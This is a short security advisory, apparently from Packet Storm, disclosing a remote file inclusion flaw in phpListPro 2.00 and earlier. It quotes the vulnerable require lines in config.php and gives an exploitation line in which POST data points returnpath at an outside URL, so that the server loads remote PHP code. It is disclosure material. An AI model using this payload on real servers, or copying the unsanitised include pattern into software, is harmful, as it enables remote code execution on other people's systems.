phpListPro versions less than or equal to 2.00 suffer from a remote file inclusion vulnerability.
ce07d9783a0736584538cef9410137d892eeb52d335c7533517c632a6f053828phpListPro <= 2.0 - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: https://smartisoft.com
Risc: High
Credits:
----------------------------
'Aesthetico'
https://www.majorsecurity.de
Description:
----------------------------
PHP/mySQL rating TopList professional.
Vulnerability:
----------------------------
The config.php is vulnerable at following lines:
142: require ($returnpath."lang_".$default_language.".php");
143: require ($returnpath."library.php");
Solution:
----------------------------
There isn't a solution yet.
Exploitation:
----------------------------
Post data:
returnpath=https://www.yourspace.com/yourscript.php?
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed